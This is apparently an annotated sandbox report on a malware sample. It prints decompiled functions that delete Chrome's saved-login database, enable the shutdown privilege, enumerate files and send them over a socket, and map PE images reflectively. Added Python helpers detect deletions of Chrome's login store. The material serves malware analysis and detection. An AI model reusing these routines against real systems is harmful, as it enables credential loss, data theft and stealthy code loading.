                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044523b
                                                                      0x00445231
                                                                      0x00445246
                                                                      0x00445248
                                                                      0x00445397
                                                                      0x00445397
                                                                      0x0044524e
                                                                      0x0044524e
                                                                      0x00000000
                                                                      0x0044524e
                                                                      0x00000000
                                                                      0x00445248
                                                                      0x00445241
                                                                      0x00445243
                                                                      0x00445243
                                                                      0x00000000
                                                                      0x00445243
                                                                      0x0044521b
                                                                      0x00000000

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00445252
                                                                      • _free.LIBCMT ref: 00445276
                                                                      • _free.LIBCMT ref: 004453FD
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1E4), ref: 0044540F
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 00445487
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004454B4
                                                                      • _free.LIBCMT ref: 004455C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: ccb01b9f61ee37204e0d058bd606834b52582125d6865a8725df1f60326a2acd
                                                                      • Instruction ID: f7821a7f91d3f0875b1a28afb9d9e7c779d5ce74aedd7f64ab9f5502304d4b62
                                                                      • Opcode Fuzzy Hash: ccb01b9f61ee37204e0d058bd606834b52582125d6865a8725df1f60326a2acd
                                                                      • Instruction Fuzzy Hash: 89C12971E00605ABEF209F79D841BAEBBB8EF41354F2441AFE88097352E7788D41CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

C-Code - Quality: 82%
			/* Builds %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Login Data
			   and deletes it, i.e. wipes Chrome's saved-password database (the page's
			   "Contains functionality to steal Chrome passwords or cookies" signature).
			   Returns 1 when the file was deleted or is treated as absent, 0 on any other
			   error, for example a sharing violation while Chrome holds the database open.
			   _t7 and _t37 are decompiler temporaries left undeclared (quality 82%). */
			E0040A0A6(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				/* E00438A1A is called with "UserProfile", presumably an environment lookup;
				   E00402053 and E0040793B are the sample's string copy/append helpers. */
				_t31 = E00402053(_t20,  &_v52, __edx, _t33, E00438A1A(_t20, __eflags, "UserProfile"));
				E0040793B(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401F98();
				if(DeleteFileA(E00401F6B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					/* As decompiled this tests for 0 and 1; ERROR_FILE_NOT_FOUND is 2 and
					   ERROR_PATH_NOT_FOUND is 3, so confirm the comparison against the
					   disassembly at 0040A0F6 before relying on it. */
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						/* The status string is handed to E0040A863, presumably the sample's
						   logging/reporting routine. */
						E00402053(_t20, _t28, _t31, _t33);
						E0040A863(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401F98();
				return _t21;
			}

[Instruction address column for the function at 0x0040a0a6 to 0x0040a134 in the InstallUtil memory dump (image base 0x00400000); the instruction text was not preserved in this extraction.]

                                                                      APIs
                                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A0E2
                                                                      • GetLastError.KERNEL32 ref: 0040A0EC
                                                                      Strings
                                                                      • [Chrome StoredLogins not found], xrefs: 0040A106
                                                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040A112
                                                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A0AD
                                                                      • UserProfile, xrefs: 0040A0B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteErrorFileLast
                                                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                      • API String ID: 2018770650-1062637481
                                                                      • Opcode ID: a18a139ebd7b82c054f2b14b7fb6b520271391f881b6674baf680895b31c56a9
                                                                      • Instruction ID: cc28d4b774cce22835b38506fa5559332eac456bc2567109f0b87182df8d41ff
                                                                      • Opcode Fuzzy Hash: a18a139ebd7b82c054f2b14b7fb6b520271391f881b6674baf680895b31c56a9
                                                                      • Instruction Fuzzy Hash: B801F731A442166BCB047676DC1BCBE7724A922748F54017FF0027A1E2FD79591686CF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
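The DeleteFileA call listed above targets Chrome's Login Data database, the SQLite file in which Chromium-based browsers keep saved logins; the adjacent strings ("StoredLogins found, cleared!") show the sample deletes it deliberately. A defender with file-deletion telemetry can match that path directly. The helper below is an added example, not code from this report or from the sample: it assumes delete events have already been normalised into dicts with `action`, `image` and `target` keys (a constructed schema, not any product's), and it generalises the single `Default` profile seen in the string to Chromium's other profile directories (`Profile 1`, `Profile 2`, ...), which goes beyond what the listing itself shows.

```python
import re
from typing import Iterable

# Chromium keeps saved logins in "<profile>\Login Data" under "User Data".
# The sample only references the Default profile; also matching "Profile N"
# is an assumption (same layout for additional profiles), not taken from the report.
_LOGIN_DATA_RE = re.compile(
    r"\\Google\\Chrome\\User Data\\(?P<profile>Default|Profile \d+)\\Login Data$",
    re.IGNORECASE,
)


def _normalize(path: str) -> str:
    """Collapse forward slashes and doubled separators so both spellings match."""
    path = path.replace("/", "\\")
    while "\\\\" in path:
        path = path.replace("\\\\", "\\")
    return path.strip()


def chrome_login_store_profile(path: str):
    """Return the profile name if *path* is a Chrome Login Data database, else None."""
    m = _LOGIN_DATA_RE.search(_normalize(path))
    return m.group("profile") if m else None


def find_credential_store_deletions(events: Iterable[dict]) -> list:
    """Pick out file-delete events whose target is a Chrome Login Data file.

    Each event is a dict with at least 'action', 'image' (deleting process) and
    'target'. This dict layout is constructed for the example, not a real schema.
    """
    hits = []
    for ev in events:
        if ev.get("action") != "file_delete":
            continue
        profile = chrome_login_store_profile(ev.get("target", ""))
        if profile is None:
            continue
        image = ev.get("image", "")
        # chrome.exe rewriting its own database is routine; any other image deleting it is not
        suspicious = not image.lower().endswith("\\chrome.exe")
        hits.append({**ev, "profile": profile, "suspicious": suspicious})
    return hits


# Constructed sample telemetry (not taken from the report). The first entry uses the
# path the sample hands to DeleteFileA; the deleting image is an assumed host process.
SAMPLE_EVENTS = [
    {"action": "file_delete",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "target": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"action": "file_delete",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:/Users/victim/AppData/Local/Google/Chrome/User Data/Profile 2/Login Data"},
    {"action": "file_delete",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\victim\Downloads\Login Data.txt"},
    {"action": "file_create",
     "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for hit in find_credential_store_deletions(SAMPLE_EVENTS):
        tag = "SUSPICIOUS" if hit["suspicious"] else "benign    "
        print(f"{tag} {hit['image']} deleted Login Data ({hit['profile']})")
```

Deletion by the browser itself is filtered as benign only by image name; in production the check belongs on a signed-image or parent-process attribute, since a process injected into chrome.exe would pass the name test.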

                                                                      C-Code - Quality: 100%
                                                                      			E00414706() {
                                                                      				void* _v8;                          // token handle of the current process
                                                                      				intOrPtr _v12;                      // same stack slot as _v24.Privileges[0].Attributes
                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                      				int _t16;                           // result of AdjustTokenPrivileges (left unnamed in the raw listing)

                                                                      				// 0x28 = TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x08)
                                                                      				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);                        // 0x0041471a
                                                                      				// SeShutdownPrivilege is what ExitWindowsEx / InitiateSystemShutdown require
                                                                      				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));     // 0x0041472c
                                                                      				_v24.PrivilegeCount = 1;                                                   // 0x00414738
                                                                      				_v12 = 2;                           // SE_PRIVILEGE_ENABLED                  // 0x00414744
                                                                      				_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);                     // 0x0041474b
                                                                      				// AdjustTokenPrivileges returns nonzero even when the token does not hold the
                                                                      				// privilege (GetLastError() is then ERROR_NOT_ALL_ASSIGNED), so the boolean is
                                                                      				// only meaningful together with the error code; the decompiler folds both into
                                                                      				// one return value (error code in the upper bytes, the boolean in the low byte).
                                                                      				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;                  // 0x00414760
                                                                      			}

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00414713
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0041471A
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041472C
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041474B
                                                                      • GetLastError.KERNEL32 ref: 00414751
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 3534403312-3733053543
                                                                      • Opcode ID: 5a5671f6900c515d0edc4424fdf7b3e8b23515ad87101631e9f6bb88c789e1ee
                                                                      • Instruction ID: 1c9adcd754f811f8294ea553a0228dc096f64ae90ce9137a5c4824f07943dca2
                                                                      • Opcode Fuzzy Hash: 5a5671f6900c515d0edc4424fdf7b3e8b23515ad87101631e9f6bb88c789e1ee
                                                                      • Instruction Fuzzy Hash: 9CF05E75801228BBDB109B90ED4DEEF7FBCEF4571AF110060F905A6152D6388A84DBB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00407AC0(signed int __ecx, void* __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* _t101;
                                                                      				intOrPtr* _t106;
                                                                      				signed int _t116;
                                                                      				void* _t128;
                                                                      				void* _t149;
                                                                      				void* _t152;
                                                                      				signed int _t154;
                                                                      				signed int _t167;
                                                                      				signed int _t180;
                                                                      				signed int _t182;
                                                                      				void* _t265;
                                                                      				void* _t267;
                                                                      				void* _t273;
                                                                      				void* _t275;
                                                                      				intOrPtr _t276;
                                                                      				void* _t277;
                                                                      				void* _t280;
                                                                      
                                                                      				_t182 = __ecx;
                                                                      				E00453798(E00453B73, _t273);   // EH prologue: registers handler E00453B73; the [fs:0] store at the end unwinds it
                                                                      				_t276 = _t275 - 0x300;
                                                                      				_push(_t265);
                                                                      				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
                                                                      				_t180 = _t182;
                                                                      				 *(_t273 - 0x18) = _t180;
                                                                      				E0040209F(_t180, _t273 - 0x9c);
                                                                      				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
                                                                      				 *_t180 = 0;                   // clear the stop flag that every FindNextFileW iteration tests
                                                                      				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
                                                                      				_t260 = _t180 + 4;
                                                                      				E00404804(_t180 + 4);
                                                                      				_t101 = E0040489F(_t180 + 4, _t265, _t180 + 4);
                                                                      				_t282 = _t101;
                                                                      				if(_t101 == 0) {
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					goto L4;
                                                                      				} else {
                                                                      					_t276 = _t276 - 0x18;
                                                                      					_t258 = E00402EF1(_t273 - 0x6c, _t273 + 0x38, _t273, 0x46e260);
                                                                      					E00402ED0(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
                                                                      					_push(0x64);
                                                                      					_t180 = _t180 & 0xffffff00 | E00404A78(_t260, _t174, _t282) == 0xffffffff;
                                                                      					E00401F98();
                                                                      					if(_t180 != 0) {
                                                                      						E00404DFD(_t258);
                                                                      						 *((intOrPtr*)(_t273 - 0x20)) = 1;
                                                                      						_push(0x469620);
                                                                      						_t152 = _t273 - 0x20;
                                                                      						L3:
                                                                      						_push(_t152);
                                                                      						L4:
                                                                      						E00435A36();   // reached with (&status, 0x469620) pushed: the calling pattern of _CxxThrowException(pExceptionObject, pThrowInfo), i.e. throw the int status set just before (1/4: E00404A78 returned -1, 2: FindFirstFileW failed, 3: E00407ED2 returned 0)
                                                                      					}
                                                                      				}
                                                                      				_t261 = E004022C5(_t273 + 0x20, _t273 - 0x30);
                                                                      				_t106 = E0040228A(_t273 + 0x20, _t273 - 0x34);
                                                                      				E00408448(_t273 - 0x3c,  *((intOrPtr*)(E004022C5(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
                                                                      				_t277 = _t276 + 0xc;
                                                                      				_t252 = _t273 + 8;
                                                                      				_t267 = FindFirstFileW(E00401EC4(E004078F9(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);   // enumerate "<dir>\*"; ebp-0x304 is a WIN32_FIND_DATAW (0x250 bytes, ending exactly at the next local, ebp-0xb4)
                                                                      				 *(_t273 - 0x1c) = _t267;
                                                                      				E00401EC9();
                                                                      				_t285 = _t267 - 0xffffffff;
                                                                      				if(_t267 != 0xffffffff) {   // INVALID_HANDLE_VALUE: the directory could not be opened
                                                                      					goto L7;
                                                                      				} else {
                                                                      					_t276 = _t277 - 0x18;
                                                                      					E00402053(_t180, _t276, _t252, _t273, 0x461084);
                                                                      					_push(0x65);
                                                                      					E00404A78( *(_t273 - 0x18) + 4, _t252, _t285);
                                                                      					E00404DFD(_t252);
                                                                      					 *((intOrPtr*)(_t273 - 0x24)) = 2;
                                                                      					_push(0x469620);
                                                                      					_t152 = _t273 - 0x24;
                                                                      					goto L3;
                                                                      				}
                                                                      				while(1) {
                                                                      					L7:
                                                                      					_t116 = FindNextFileW(_t267, _t273 - 0x304);   // next entry into the same WIN32_FIND_DATAW; zero means no more entries (or an error)
                                                                      					__eflags = _t116;
                                                                      					if(_t116 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t180 =  *(_t273 - 0x18);
                                                                      					__eflags =  *_t180;
                                                                      					if( *_t180 == 0) {   // stop flag still clear; once set, the walk is abandoned (FindClose in the else branch)
                                                                      						__eflags =  *(_t273 - 0x304) & 0x00000010;
                                                                      						if(( *(_t273 - 0x304) & 0x00000010) == 0) {   // dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
                                                                      							L17:
                                                                      							E0040413E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);   // ebp-0x2d8 = find data + 0x2c = cFileName
                                                                      							_t261 = E004022C5(_t273 - 0x84, _t273 - 0x3c);
                                                                      							_t270 = E0040228A(_t273 - 0x84, _t273 - 0x38);
                                                                      							E00408448(_t273 - 0x30,  *((intOrPtr*)(E004022C5(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
                                                                      							_t277 = _t277 + 0xc;
                                                                      							__eflags = E004082CB(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								L20:
                                                                      								E00401EC9();
                                                                      								_t267 =  *(_t273 - 0x1c);
                                                                      								continue;
                                                                      							} else {
                                                                      								E00401FA2(_t273 - 0x9c, _t252, _t270, E00402077(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));   // hands on the whole find record; 0x250 = sizeof(WIN32_FIND_DATAW)
                                                                      								E00401F98();
                                                                      								_t277 = _t277 - 0x18;
                                                                      								_t252 = E00402ED0(_t180, _t273 - 0x54, E00418445(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x46e260);
                                                                      								E00402ED0(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
                                                                      								_push(0x66);
                                                                      								_t149 = E00404A78(_t180 + 4, _t147, __eflags);
                                                                      								__eflags = _t149 - 0xffffffff;
                                                                      								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								__eflags = _t180;
                                                                      								if(_t180 == 0) {
                                                                      									goto L20;
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
                                                                      									_push(0x469620);
                                                                      									_t152 = _t273 - 0x2c;
                                                                      									goto L3;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t154 = E00438B0D(_t273 - 0x2d8, _t273 - 0x2d8, ".");   // compare cFileName against "." (skip the current-directory entry)
                                                                      							__eflags = _t154;
                                                                      							if(_t154 == 0) {
                                                                      								goto L17;
                                                                      							} else {
                                                                      								__eflags = E00438B0D(_t273 - 0x2d8, _t273 - 0x2d8, L"..");   // and against ".." (skip the parent-directory entry)
                                                                      								if(__eflags == 0) {
                                                                      									goto L17;
                                                                      								} else {
                                                                      									_t252 = E004079C1(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040413E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
                                                                      									E00402FD4(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");   // build "<dir>\<subdir>\" so the subdirectory is searched the same way
                                                                      									E00401EC9();
                                                                      									E00401EC9();
                                                                      									_t280 = _t277 - 0x18;
                                                                      									E0040773A(_t180, _t280, _t159, __eflags, _t273 + 0x20);
                                                                      									_t277 = _t280 - 0x18;
                                                                      									E0040773A(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
                                                                      									_t167 = E00407ED2(_t180, _t159, __eflags);   // process the subdirectory path pushed above; zero aborts the walk with status 3
                                                                      									__eflags = _t167;
                                                                      									if(_t167 != 0) {
                                                                      										E00401EC9();
                                                                      										goto L17;
                                                                      									} else {
                                                                      										 *((intOrPtr*)(_t273 - 0x28)) = 3;
                                                                      										_push(0x469620);
                                                                      										_t152 = _t273 - 0x28;
                                                                      										goto L3;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L23:
                                                                      						E00401F98();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      						_t128 = E00401F98();
                                                                      						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
                                                                      						return _t128;
                                                                      					} else {
                                                                      						FindClose(_t267);   // stop flag was set: close the search handle and fall through to cleanup
                                                                      					}
                                                                      					L10:
                                                                      					E00404DFD(_t252);
                                                                      					goto L23;
                                                                      				}
                                                                      				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
                                                                      				FindClose(_t267);   // enumeration finished normally
                                                                      				_t252 = E00402EF1(_t273 - 0x54, _t273 + 0x38, _t273, 0x46e260);
                                                                      				E00402ED0(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
                                                                      				_push(0x67);
                                                                      				E00404A78( *(_t273 - 0x18) + 4, _t119, __eflags);
                                                                      				E00401F98();
                                                                      				goto L10;
                                                                      			}
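The decompiler names none of the locals, so `_t273 - 0x304`, `_t273 - 0x2d8`, the `0x10` mask and the `0x250` length have to be recovered by hand against the structure FindFirstFileW fills in. The helper below is an added example, not part of the report or of the sample: it lays out the 32-bit `WIN32_FIND_DATAW` field by field (the documented Win32 layout) and resolves ebp-relative displacements from the walker above against it. The displacements passed in the `__main__` block are the ones that appear in the listing; the adjacent local at ebp-0xb4 is included to show that it lies just past the end of the structure.

```python
"""Map ebp-relative displacements from the decompiled walker onto WIN32_FIND_DATAW."""
from typing import Optional, Tuple

# Documented 32-bit layout of WIN32_FIND_DATAW in declaration order.
# Every field starts at a multiple of its own alignment, so there is no padding.
WIN32_FIND_DATAW = [
    ("dwFileAttributes",   4),
    ("ftCreationTime",     8),        # FILETIME
    ("ftLastAccessTime",   8),
    ("ftLastWriteTime",    8),
    ("nFileSizeHigh",      4),
    ("nFileSizeLow",       4),
    ("dwReserved0",        4),
    ("dwReserved1",        4),
    ("cFileName",          2 * 260),  # WCHAR[MAX_PATH]
    ("cAlternateFileName", 2 * 14),   # WCHAR[14]
]

FILE_ATTRIBUTE_FLAGS = {
    0x01: "FILE_ATTRIBUTE_READONLY",
    0x02: "FILE_ATTRIBUTE_HIDDEN",
    0x04: "FILE_ATTRIBUTE_SYSTEM",
    0x10: "FILE_ATTRIBUTE_DIRECTORY",
    0x20: "FILE_ATTRIBUTE_ARCHIVE",
    0x80: "FILE_ATTRIBUTE_NORMAL",
    0x400: "FILE_ATTRIBUTE_REPARSE_POINT",
}


def struct_layout(fields):
    """Return ({field: offset}, total_size) for a packed, naturally aligned field list."""
    offsets, cur = {}, 0
    for name, size in fields:
        offsets[name] = cur
        cur += size
    return offsets, cur


def resolve_displacement(base_disp: int, disp: int,
                         fields=WIN32_FIND_DATAW) -> Optional[Tuple[str, int]]:
    """Translate an ebp displacement into (field, offset_within_field).

    base_disp is the displacement of the structure itself (here -0x304, the buffer
    handed to FindFirstFileW); disp is the displacement being decoded. Returns None
    when disp falls outside the structure, i.e. refers to some other local.
    """
    offsets, total = struct_layout(fields)
    rel = disp - base_disp
    if not 0 <= rel < total:
        return None
    for name, size in fields:
        start = offsets[name]
        if start <= rel < start + size:
            return name, rel - start
    return None  # not reachable: rel is inside [0, total)


def decode_attributes(mask: int) -> list:
    """Expand a dwFileAttributes mask into symbolic names (unknown bits kept as hex)."""
    names = [n for bit, n in FILE_ATTRIBUTE_FLAGS.items() if mask & bit]
    leftover = mask & ~sum(FILE_ATTRIBUTE_FLAGS)
    if leftover:
        names.append(hex(leftover))
    return names


if __name__ == "__main__":
    FIND_DATA = -0x304   # displacement of the WIN32_FIND_DATAW buffer in E00407AC0
    _, size = struct_layout(WIN32_FIND_DATAW)
    print(f"sizeof(WIN32_FIND_DATAW) = {size:#x}")   # the length passed alongside the record
    for disp in (-0x304, -0x2d8, -0x2c0, -0xb4):
        print(f"ebp{disp:#x} -> {resolve_displacement(FIND_DATA, disp)}")
    print("mask 0x10 ->", decode_attributes(0x10))   # the test in the walker's directory branch
```

The same table-driven resolver works for any other structure a decompiler leaves as raw displacements; replace the field list and the base displacement and the arithmetic is unchanged.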
                                                                      Statement addresses for E00407AC0 (the per-line address column of the original listing, flattened by extraction) run from 0x00407ac0 to 0x00407e6f; entries shown as 0x00000000 carry no address.
                                                                      0x00407d04
                                                                      0x00000000
                                                                      0x00407ced
                                                                      0x00407ced
                                                                      0x00407cf4
                                                                      0x00407cf9
                                                                      0x00000000
                                                                      0x00407cf9
                                                                      0x00407ceb
                                                                      0x00407c7e
                                                                      0x00407c63
                                                                      0x00407e94
                                                                      0x00407e9a
                                                                      0x00407ea2
                                                                      0x00407eaa
                                                                      0x00407eb2
                                                                      0x00407eba
                                                                      0x00407ec2
                                                                      0x00407ecf
                                                                      0x00407c2d
                                                                      0x00407c2e
                                                                      0x00407c34
                                                                      0x00407c37
                                                                      0x00407c37
                                                                      0x00000000
                                                                      0x00407c37
                                                                      0x00407e21
                                                                      0x00407e26
                                                                      0x00407e49
                                                                      0x00407e4d
                                                                      0x00407e53
                                                                      0x00407e58
                                                                      0x00407e60
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00407AC5
                                                                        • Part of subcall function 0040489F: connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00407B61
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00407BBF
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00407C17
                                                                      • FindClose.KERNEL32(00000000), ref: 00407C2E
                                                                        • Part of subcall function 00404DFD: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E278,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E0F
                                                                        • Part of subcall function 00404DFD: SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E1A
                                                                        • Part of subcall function 00404DFD: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E23
                                                                      • FindClose.KERNEL32(00000000), ref: 00407E26
                                                                        • Part of subcall function 00404A78: WaitForSingleObject.KERNEL32(00000000,00000000,TT@s,?,?,00000004,?,?,00000004,?,0046E278,R@), ref: 00404B1E
                                                                        • Part of subcall function 00404A78: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,0046E278,R@,?,?,?,?,?,00405454), ref: 00404B4C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                      • String ID:
                                                                      • API String ID: 2435342581-0
                                                                      • Opcode ID: 83ad3c1b75d2af4a5de5189c40dd5593f20660b41cdc5c834f3f25449f138c7d
                                                                      • Instruction ID: 25bbee52f1dc94610b5c8265aa6f19644755407f49a30b22f0f3444576a4632b
                                                                      • Opcode Fuzzy Hash: 83ad3c1b75d2af4a5de5189c40dd5593f20660b41cdc5c834f3f25449f138c7d
                                                                      • Instruction Fuzzy Hash: CEB17F719001099BCB14FBA1DD96AED7379AF04308F1041BFF506B61E2EF786A49CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			// Manual PE mapper (reflective loader). Control flow, error codes and the 0x40-byte
                                                                      			// context it allocates match the open-source MemoryModule loader (MemoryLoadLibraryEx):
                                                                      			// __ecx = raw image bytes, __edx = their length; returns the context or 0 with
                                                                      			// GetLastError() set.
                                                                      			E0040F87E(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
                                                                      				signed int _t52;
                                                                      				signed int _t55;
                                                                      				void* _t58;
                                                                      				signed int _t66;
                                                                      				signed int _t68;
                                                                      				void* _t73;
                                                                      				signed int _t74;
                                                                      				void* _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t78;
                                                                      				signed int _t80;
                                                                      				signed int _t81;
                                                                      				signed int _t82;
                                                                      				void* _t86;
                                                                      				signed int _t87;
                                                                      				intOrPtr* _t90;
                                                                      				signed int _t104;
                                                                      				void* _t106;
                                                                      				signed int _t109;
                                                                      				void* _t115;
                                                                      				void* _t116;
                                                                      				signed int _t117;
                                                                      				signed int _t119;
                                                                      				void* _t121;
                                                                      				signed int _t123;
                                                                      				signed int _t126;
                                                                      				void* _t127;
                                                                      				void* _t128;
                                                                      
                                                                      				_t106 = 0x40;                                    // sizeof(IMAGE_DOS_HEADER)
                                                                      				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
                                                                      				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
                                                                      				_t119 = 0;                                       // end of the highest section, computed below
                                                                      				// E0040F326 is a size check: the buffer must hold at least the requested byte count.
                                                                      				if(E0040F326(__edx, _t106) != 0) {
                                                                      					__eflags =  *__ecx - 0x5a4d;
                                                                      					if( *__ecx == 0x5a4d) {                          // IMAGE_DOS_SIGNATURE "MZ"
                                                                      						// e_lfanew + sizeof(IMAGE_NT_HEADERS32) must fit in the buffer
                                                                      						_t52 = E0040F326(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                                                                      						__eflags = _t52;
                                                                      						if(_t52 == 0) {
                                                                      							goto L1;
                                                                      						}
                                                                      						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;    // _t90 = IMAGE_NT_HEADERS32*
                                                                      						__eflags =  *_t90 - 0x4550;
                                                                      						if( *_t90 != 0x4550) {                           // IMAGE_NT_SIGNATURE "PE\0\0"
                                                                      							goto L3;
                                                                      						}
                                                                      						// FileHeader.Machine must be IMAGE_FILE_MACHINE_I386: only 32-bit x86 images are mapped
                                                                      						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
